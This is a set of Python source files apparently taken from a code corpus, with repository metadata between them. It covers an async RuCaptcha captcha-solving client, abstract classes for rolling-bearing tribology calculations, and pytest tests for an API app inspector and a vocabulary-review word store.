        :param img_clearing: True - delete the file after solving,
            False - keep the file after solving;
        :param kwargs: Optional parameters merged into the request
            payload sent to RuCaptcha
        Detailed examples are available in 'CaptchaTester/image_captcha_example.py'
"""
        # time to wait for the captcha solution
        self.sleep_time = sleep_time
        # service URL type the library works with
        self.service_type = service_type
        # validate the requested way of saving the captcha image
        if save_format in ["const", "temp"]:
            self.save_format = save_format
            # if files are saved to a folder
            if self.save_format == "const":
                # clear the folder after solving - True,
                # keep all files - False
                self.img_clearing = img_clearing
                # folder name for saving captcha files
                self.img_path = img_path
                # create the folder for saving captchas
                os.makedirs(self.img_path, exist_ok=True)
else:
raise ValueError(
"\nПередан неверный формат сохранения файла изображения. "
f"\n\tВозможные варинты: `temp` и `const`. Вы передали - `{save_format}`"
"\nWrong `save_format` parameter. Valid params: `const` or `temp`."
f"\n\tYour param - `{save_format}`"
)
        # payload of the POST request that uploads the captcha to the server
        self.post_payload = {
            "key": rucaptcha_key,
            "method": "base64",
            "json": 1,
            "soft_id": app_key,
        }
        # merge any extra parameters into post_payload
        if kwargs:
            for key in kwargs:
                self.post_payload.update({key: kwargs[key]})
        # payload of the GET request that fetches the captcha solution
self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
return True
async def __image_temp_saver(self, content: bytes):
"""
        Send the captcha straight to the server for solving.
        :return: Captcha ID from the service
"""
captcha_id = None
try:
self.post_payload.update({"body": base64.b64encode(content).decode("utf-8")})
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
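The async variant performs the same base64-body update, only inside `async with` blocks with an awaited response. A stdlib-only sketch of that flow, with a stub standing in for `aiohttp.ClientSession.post` (the `FakeResponse` class and `submit` function are invented for illustration):

```python
import asyncio
import base64

class FakeResponse:
    """Stub for the response object returned by `session.post(...)`."""
    async def __aenter__(self):
        return self
    async def __aexit__(self, *exc):
        return False
    async def json(self):
        # JSON answer shaped like the real service response
        return {"status": 1, "request": "42"}

async def submit(content: bytes, payload: dict) -> dict:
    """Mirror of __image_temp_saver: update `body`, await the POST."""
    payload = {**payload, "body": base64.b64encode(content).decode("utf-8")}
    async with FakeResponse() as resp:  # stands in for session.post(...)
        return await resp.json()

result = asyncio.run(submit(b"img", {"method": "base64"}))
```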
async def __image_const_saver(self, content: bytes):
"""
        Create a folder and save the image into it
        :return: Captcha ID from the service
"""
captcha_id = None
try:
            # unique image name
image_name = uuid.uuid4()
with open(os.path.join(self.img_path, f"im-{image_name}.png"), "wb") as out_image:
out_image.write(content)
with open(os.path.join(self.img_path, f"im-{image_name}.png"), "rb") as captcha_image:
                # Send the captcha image and other parameters to RuCaptcha
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
async def __local_image_captcha(self, content: str, content_type: str = "file"):
"""
        Take a local file path (or a base64-encoded file)
        as a parameter and send the image for checking
        to obtain its ID
        :param content: Path to the local file
        :param content_type: Type of the passed file;
            may be `file` (local path) or
            `base64` (base64-encoded image)
        :return: Captcha ID in the service
"""
captcha_id = None
try:
if content_type == "file":
with open(content, "rb") as captcha_image:
                    # Send the captcha image and other parameters to RuCaptcha
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
elif content_type == "base64":
self.post_payload.update({"body": content})
else:
raise ValueError(
f"Передан неверный тип контента! Допустимые: `file` и `base64`. "
f"Вы передали: `{content_type}`"
)
async with aiohttp.ClientSession() as session:
async with session.post(self.url_request, data=self.post_payload) as resp:
captcha_id = await resp.json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
@api_key_check
@service_check
async def captcha_handler(
self,
captcha_link: str = None,
captcha_file: str = None,
captcha_base64: str = None,
proxy: str = None,
):
"""
        Take a captcha, send the image to the RuCaptcha server, wait for
        the captcha to be solved and return the result
        :param captcha_link: Link to the image
        :param captcha_file: Local path of the image to send for solving
        :param captcha_base64: Image passed as a base64-encoded string
        :param proxy: Proxy for the aiohttp module
        :return: Captcha answer as a JSON string with the fields:
                    captchaSolve - the captcha solution,
                    taskId - ID of the captcha-solving task,
                    error - False if all is well, True on error,
                    errorBody - name of the error
        """
        # result, url_request, url_response are set in the `service_check`
        # decorator after validation
        # a local file path was passed - work with it
if captcha_file:
captcha_id = await self.__local_image_captcha(captcha_file)
        # a base64-encoded file was passed
elif captcha_base64:
captcha_id = await self.__local_image_captcha(captcha_base64, content_type="base64")
elif captcha_link:
try:
async with aiohttp.ClientSession() as session:
async with session.get(url=captcha_link, proxy=proxy) as resp:
content = await resp.content.read()
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
return self.result
            # handle the file according to the passed parameter
if self.save_format == "const":
captcha_id = await self.__image_const_saver(content)
elif self.save_format == "temp":
captcha_id = await self.__image_temp_saver(content)
else:
self.result.update(
{"error": True, "errorBody": "You did not send any file local link or URL."}
)
return self.result
        # check for errors while downloading/uploading the file
        if self.result["error"]:
            return self.result
        # if the response carries an error, record it and return the result
        elif captcha_id["status"] == 0:
            self.result.update({"error": True, "errorBody": captcha_id["request"]})
            return self.result
        # otherwise take the key of the submitted captcha and wait for the solution
        else:
            captcha_id = captcha_id["request"]
            # store the key of the submitted captcha in taskId
            self.result.update({"taskId": captcha_id})
            # update the payload with the captcha key
            self.get_payload.update({"id": captcha_id})
            # if a `pingback` parameter was passed, return the unfilled response
if self.post_payload.get("pingback"):
return self.get_payload
else:
                # wait for the captcha solution
await asyncio.sleep(self.sleep_time)
return await get_async_result(
get_payload=self.get_payload,
sleep_time=self.sleep_time,
url_response=self.url_response,
result=self.result,
)
def __del__(self):
if self.save_format == "const":
if self.img_clearing:
shutil.rmtree(self.img_path)
cef3b29f61b7d37f44c3f9a47e324f8ac0958e15 | 6,350 | py | Python | tribology/p3can/BluPrintRollBear.py | moritzploss/tribology | 09bf75d670fb3d86575ca4bdced00d5dce2d4af7 | ["MIT"] | 11 | 2017-11-23T12:55:05.000Z | 2022-02-06T23:04:39.000Z | tribology/p3can/BluPrintRollBear.py | moritzploss/tribology | 09bf75d670fb3d86575ca4bdced00d5dce2d4af7 | ["MIT"] | 5 | 2021-03-18T20:59:50.000Z | 2022-03-11T23:29:22.000Z | tribology/p3can/BluPrintRollBear.py | moritzploss/tribology | 09bf75d670fb3d86575ca4bdced00d5dce2d4af7 | ["MIT"] | 4 | 2019-06-15T04:23:25.000Z | 2022-02-06T23:04:22.000Z |
from abc import ABCMeta, abstractmethod
from BluPrintTriboSys import TriboSys
class RollBear(TriboSys, metaclass=ABCMeta):
    """
    Abstract base class for rolling element bearings.

    Attributes:
        roller: The bearing's rolling element.
        ring1: The inner ring of the bearing.
        ring2: The outer ring of the bearing.
        num_rollers: An integer giving the number of rolling elements.
    """
def __init__(self, name, number_rollers, roller, inner_ring, outer_ring,
global_force, init_force):
super().__init__(name, global_force, init_force)
self.roller = roller
self.ring1 = inner_ring
self.ring2 = outer_ring
self.num_rollers = number_rollers
self.rot_vel1 = 0
self.rot_vel2 = 0
self.mean_diam = None
self.eff_rot_vel = None
self.eff_omega = None
self.eff_omega_cage = None
self.footpr_vel = None
self.actual_raceway_vel_roller = None
@abstractmethod
def calc_load_distribution(self, ui=None, res_dir=None):
"""Calculate the load distribution within the tribosystem"""
pass
@abstractmethod
def calc_contact_pressure(self, ui=None, res_dir=None):
"""Calculate the contact pressure for each contact in the tribosystem"""
pass
@abstractmethod
def calc_kinematics(self, rot_velocity, rot_velocity2, ui=None,
res_dir=None):
"""Calculate the kinematics of the tribosystem"""
pass
@abstractmethod
def calc_pv(self, ui=None, res_dir=None):
        """Calculate the product of the local maximum pressure and the
        relative velocity between ring and roller"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
        """Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def plot_it(self, ui=None, res_dir=None):
"""Plot relevant calculation results"""
pass
@abstractmethod
def generate_latex_output(self, calc_spec_tex_file_handle, simulation,
ui=None, res_dir=None):
pass
@abstractmethod
def generate_latex_figures(self, ui=None, res_dir=None):
pass
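With a Python 3 ABC in place (note that the Python 2 spelling `__metaclass__ = ABCMeta` inside a class body has no effect in Python 3; the `metaclass=ABCMeta` keyword is required), a subclass can only be instantiated once every `@abstractmethod` has a concrete override. A self-contained sketch of that enforcement, using toy class names:

```python
from abc import ABC, abstractmethod

class Bearing(ABC):
    @abstractmethod
    def calc_load_distribution(self):
        """Calculate the load distribution within the tribosystem"""

class IncompleteBearing(Bearing):
    pass  # abstract method not overridden: class itself stays abstract

class CylindricalBearing(Bearing):
    def calc_load_distribution(self):
        return "load distribution computed"

try:
    IncompleteBearing()  # raises TypeError: abstract method missing
    raised = False
except TypeError:
    raised = True
assert raised
assert CylindricalBearing().calc_load_distribution() == "load distribution computed"
```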
class AxialRollBear(RollBear):
"""Global bearing data"""
def __init__(self, name, number_rollers, roller, shaft_ring, housing_ring,
global_force, mean_diameter):
super().__init__(name, number_rollers, roller, shaft_ring, housing_ring,
global_force,
global_force / number_rollers)
self.mean_diameter = mean_diameter
self.pv = None
@abstractmethod
def calc_load_distribution(self, ui=None, res_dir=None):
"""Calculate the load distribution within the tribosystem"""
pass
@abstractmethod
def calc_contact_pressure(self, ui=None, res_dir=None):
"""Calculate the contact pressure for each contact in the tribosystem"""
pass
@abstractmethod
def calc_kinematics(self, rot_velocity, rot_velocity2, ui=None,
res_dir=None):
"""Calculate the kinematics of the tribosystem"""
pass
@abstractmethod
def calc_pv(self, ui=None, res_dir=None):
""""Calculate the product of the local maximum pressure and the relative
velocity between ring and roller"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
""""Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def plot_it(self, ui=None, res_dir=None):
"""Plot relevant calculation results"""
pass
@abstractmethod
def generate_latex_output(self, calc_spec_tex_file_handle, simulation,
ui=None, res_dir=None):
"""Generate LaTeX output"""
pass
@abstractmethod
def generate_latex_figures(self, ui=None, res_dir=None):
"""Generate LaTeX figures"""
pass
class RadialRollBear(RollBear):
"""Global bearing data"""
def __init__(self, name, number_rollers, roller, inner_ring, outer_ring,
global_force, radial_clearance, res_pol,
path_roller_slip):
super().__init__(name, number_rollers, roller, inner_ring, outer_ring,
global_force, global_force)
# mean (pitch) diameter: average of the inner and outer ring diameters
self.mean_diameter = (self.ring1.diameter + self.ring2.diameter) / 2
self.rad_clear = radial_clearance
self.pv_ring1 = None
self.pv_ring2 = None
self.path_roller_slip = path_roller_slip
self.res_pol = res_pol
self.pol_ax = None
self.dd_phi = None
self.d_phi = None
self.num_roller_pos = None
self.phi_mat = None
self.phi = None
@abstractmethod
def calc_load_distribution(self, ui=None, res_dir=None):
"""Calculate the load distribution within the tribosystem"""
pass
@abstractmethod
def calc_contact_pressure(self, ui=None, res_dir=None):
"""Calculate the contact pressure for each contact in the tribosystem"""
pass
@abstractmethod
def calc_kinematics(self, rot_velocity, rot_velocity2, ui=None,
res_dir=None):
"""Calculate the kinematics of the tribosystem"""
pass
@abstractmethod
def calc_pv(self, ui=None, res_dir=None):
""""Calculate the product of the local maximum pressure and the relative
velocity between ring and roller"""
pass
@abstractmethod
def calc_e_akin(self, ui=None, res_dir=None):
""""Calculate the kinetic friction energy accumulation"""
pass
@abstractmethod
def plot_it(self, ui=None, res_dir=None):
"""Plot relevant calculation results"""
pass
@abstractmethod
def generate_latex_output(self, calc_spec_tex_file_handle, simulation,
ui=None, res_dir=None):
"""Generate LaTeX output"""
pass
@abstractmethod
def generate_latex_figures(self, ui=None, res_dir=None):
"""Generate LaTeX figures"""
pass
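When the ABC metaclass is attached (in Python 3, via the `metaclass=` keyword in the class signature rather than a `__metaclass__` attribute), instantiating a subclass that still misses an abstract method fails at construction time. A minimal stand-alone sketch of that contract; `Base` and the single-method interface are illustrative stand-ins for `TriboSys` and the full bearing API:

```python
from abc import ABCMeta, abstractmethod


class Base:
    def __init__(self, name):
        self.name = name


class Bearing(Base, metaclass=ABCMeta):
    @abstractmethod
    def calc_load_distribution(self, ui=None, res_dir=None):
        pass


class CylindricalBearing(Bearing):
    # overriding the abstract method makes the class instantiable
    def calc_load_distribution(self, ui=None, res_dir=None):
        return 'distributed'


# Bearing('b') raises TypeError (abstract method not implemented);
# CylindricalBearing('b') instantiates normally.
```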
| 31.75 | 81 | 0.619685 | 729 | 6,350 | 5.153635 | 0.163237 | 0.113122 | 0.059888 | 0.079851 | 0.778014 | 0.772159 | 0.767368 | 0.760447 | 0.760447 | 0.760447 | 0 | 0.003156 | 0.301417 | 6,350 | 199 | 82 | 31.909548 | 0.843778 | 0.208819 | 0 | 0.65873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005025 | 0 | 1 | 0.222222 | false | 0.198413 | 0.015873 | 0 | 0.269841 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
30158ba96830fa9b4f0cab993a15b0de56dda209 | 3,216 | py | Python | tests/test_inspect_app.py | jeffbuttars/apistar-autoapp | 0c00d7650cfa860eeab71e58fd5b30cd04a3f1a1 | [
"Apache-2.0"
] | 5 | 2018-05-30T12:47:18.000Z | 2018-06-17T07:11:11.000Z | tests/test_inspect_app.py | jeffbuttars/apistar-autoapp | 0c00d7650cfa860eeab71e58fd5b30cd04a3f1a1 | [
"Apache-2.0"
] | 3 | 2018-05-23T14:20:20.000Z | 2021-06-01T22:21:46.000Z | tests/test_inspect_app.py | jeffbuttars/apistar-autoapp | 0c00d7650cfa860eeab71e58fd5b30cd04a3f1a1 | [
"Apache-2.0"
] | null | null | null | import pytest
from apistar_autoapp.autoapp import inspect_app
def test_inspect_app_top():
with pytest.raises(TypeError):
res = inspect_app()
res = inspect_app(tuple())
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == tuple()
def test_inspect_app_v1():
res = inspect_app(('tests', 'v1'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1')
def test_inspect_app_v2():
res = inspect_app(('tests', 'v2'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2')
def test_inspect_app_v1_subs():
res = inspect_app(('tests', 'v1', 'epone'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'epone')
res = inspect_app(('tests', 'v1', 'eptwo'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'eptwo')
res = inspect_app(('tests', 'v1', 'epthree'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'epthree')
res = inspect_app(('tests', 'v1', 'deep'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'deep')
def test_inspect_app_v2_subs():
res = inspect_app(('tests', 'v2', 'epone'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2', 'epone')
res = inspect_app(('tests', 'v2', 'eptwo'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2', 'eptwo')
res = inspect_app(('tests', 'v2', 'epthree'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2', 'epthree')
with pytest.raises(ModuleNotFoundError):
inspect_app(('tests', 'v2', 'empty'))
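The empty-field assertions above are repeated verbatim for every app path; the shared check can be factored out (in pytest itself this would normally be a `@pytest.mark.parametrize` test). A stand-alone sketch with a hypothetical stub in place of the real `inspect_app`:

```python
EMPTY_KEYS = ('routes', 'components', 'template_dir', 'packages', 'event_hooks')


def fake_inspect_app(app_path):
    # hypothetical stand-in for apistar_autoapp.autoapp.inspect_app,
    # used only to keep this sketch self-contained
    return dict({key: [] for key in EMPTY_KEYS}, app_path=app_path)


def assert_empty_app(inspect, app_path):
    res = inspect(app_path)
    assert res
    assert all(res[key] == [] for key in EMPTY_KEYS)
    assert res['app_path'] == app_path


for path in [('tests', 'v1'), ('tests', 'v2'), ('tests', 'v1', 'epone')]:
    assert_empty_app(fake_inspect_app, path)
```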
| 29.236364 | 56 | 0.561256 | 364 | 3,216 | 4.791209 | 0.093407 | 0.361239 | 0.081995 | 0.103211 | 0.877867 | 0.715023 | 0.715023 | 0.715023 | 0.715023 | 0.715023 | 0 | 0.009178 | 0.220771 | 3,216 | 109 | 57 | 29.504587 | 0.686752 | 0 | 0 | 0.659341 | 0 | 0 | 0.237562 | 0 | 0 | 0 | 0 | 0 | 0.769231 | 1 | 0.054945 | false | 0 | 0.021978 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3020ce07eafce571ff7e32363f08a1b414810375 | 15,016 | py | Python | tests/store_test.py | Endlex-net/Rwords | dca9d9d7629ad943708aff91f3d4876a4b095ee4 | [
"MIT"
] | 5 | 2019-02-26T08:04:43.000Z | 2019-08-10T07:13:52.000Z | tests/store_test.py | Endlex-net/Rwords | dca9d9d7629ad943708aff91f3d4876a4b095ee4 | [
"MIT"
] | null | null | null | tests/store_test.py | Endlex-net/Rwords | dca9d9d7629ad943708aff91f3d4876a4b095ee4 | [
"MIT"
] | 2 | 2019-02-27T07:55:53.000Z | 2019-08-19T07:35:09.000Z | # -*- coding: utf-8 -*-
import json
import datetime
from rwords.store import word_store, review_list_store, word_factor_store
from rwords.models import Word, Mp3, WordFactor, ReviewList, OptimumFactorMatrix, TranMean
from rwords.core.db import session_scope
from tests import mock_info
class TestWordStore:
def test_create(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
session.commit()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_obj = session.query(Word).filter_by(id=word_id).first()
assert word_obj.word_name == mock_word_info['word_name']
assert word_obj.ph == mock_word_info['ph']
tran_mean = word_obj.tran_means[0]
assert {'part': tran_mean.part, 'means': json.loads(tran_mean.means)} == mock_word_info['tran_means'][0]
assert word_obj.mp3.url == mock_word_info['mp3_url']
assert isinstance(word_obj.word_factor, WordFactor)
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.delete(word_obj)
session.query(OptimumFactorMatrix).delete()
def test_get_word(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_info = word_store.get_word(id=word_id)
assert word_info['word_name'] == mock_word_info['word_name']
word_info = word_store.get_word(word=mock_word_info['word_name'])
assert word_info['ph'] == mock_word_info['ph']
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_words(self):
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_info.word_info['word_name']).delete()
test_word_ids = []
for i in range(10):
word_id = word_store.create(
mock_info.word_info['word_name'] + str(i),
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
test_word_ids.append(word_id)
word_infos = word_store.get_words(ids=test_word_ids, start=2, end=6)
assert len(word_infos) == 4
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_words_count(self):
with session_scope() as session:
session.query(Word).delete()
word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
assert word_store.get_words_count() == 1
with session_scope() as session:
session.query(Mp3).delete()
session.query(TranMean).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(WordFactor).delete()
session.query(OptimumFactorMatrix).delete()
def test_update_mp3(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
mock_path = '/data/mp3/mock.mp3'
mock_url = mock_word_info['mp3_url'] + 'mock'
word_store.update_mp3(id=word_id, path=mock_path, url=mock_url)
assert word_store.get_word(id=word_id)['mp3']['path'] == mock_path
assert word_store.get_word(id=word_id)['mp3']['url'] == mock_url
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
class TestReviewListStore:
def test_add_word_in_list(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.add_word_in_list(word_id, repeat_count=5)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first().repeat_count == 5
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_reduce_repeat_count(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.del_word_in_list(word_id)
review_list_store.add_word_in_list(word_id, new=False, repeat_count=2)
review_list_store.reduce_repeat_count(word_id)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first().repeat_count == 1
review_list_store.reduce_repeat_count(word_id)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first() is None
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_del_word_in_list(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.del_word_in_list(word_id)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first() is None
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_a_word_id(self):
word_id = word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
assert isinstance(review_list_store.get_a_word_id(), int)
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(TranMean).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_word_type(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.add_word_in_list(word_id)
assert review_list_store.get_word_type(word_id) is ReviewList.WordType.review
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
class TestWordFactorStore:
def test_get_OF_matrix(self):
mock_word_info = mock_info.word_info
mock_OF_matrix = mock_info.OF_matrix
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
with session_scope() as session:
word_factor_id = session.query(WordFactor).filter_by(word_id=word_id).first().id
OF_objs = [OptimumFactorMatrix(word_factor_id=word_factor_id, number=item[0], OF=item[1]) for item in
mock_OF_matrix]
session.add_all(OF_objs)
assert word_factor_store.get_OF_matrix(word_id) == mock_OF_matrix
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_EF(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
assert word_factor_store.get_EF(word_id) == 1.3
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_set_EF(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_factor_store.set_EF(word_id, 1.4)
assert word_factor_store.get_EF(word_id) == 1.4
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_set_OF_matrix(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_factor_store.set_OF_matrix(word_id, mock_info.OF_matrix)
assert word_factor_store.get_OF_matrix(word_id) == mock_info.OF_matrix
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_set_next_review_time(self):
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_info.word_info['word_name']).delete()
word_id = word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
word_factor_store.set_next_review_time(word_id=word_id, next_review_time=mock_info.next_review_time)
with session_scope() as session:
assert session.query(WordFactor).filter_by(word_id=word_id).first().next_review_time == mock_info.next_review_time
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_today_word_ids(self):
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_info.word_info['word_name']).delete()
word_id = word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
session=session,
)
word_factor = session.query(WordFactor).filter_by(word_id=word_id).first()
word_factor.next_review_time = datetime.datetime.now()
assert word_factor_store.get_today_word_ids() == [word_id]
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(WordFactor).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
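Every test above ends with the same block of `session.query(...).delete()` calls; pytest usually factors such teardown into a fixture, where everything after `yield` runs once the test finishes, even if it fails. A stdlib-only sketch of that yield/teardown mechanism, with the actual delete calls represented by a placeholder list:

```python
from contextlib import contextmanager

deleted_tables = []


@contextmanager
def clean_db():
    # setup would go here (none needed for this sketch)
    try:
        yield
    finally:
        # stands in for session.query(Mp3).delete(),
        # session.query(ReviewList).delete(), etc.
        deleted_tables.extend(['Mp3', 'ReviewList', 'Word', 'OptimumFactorMatrix'])


with clean_db():
    pass  # the test body would run here

# deleted_tables now records that teardown ran exactly once
```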
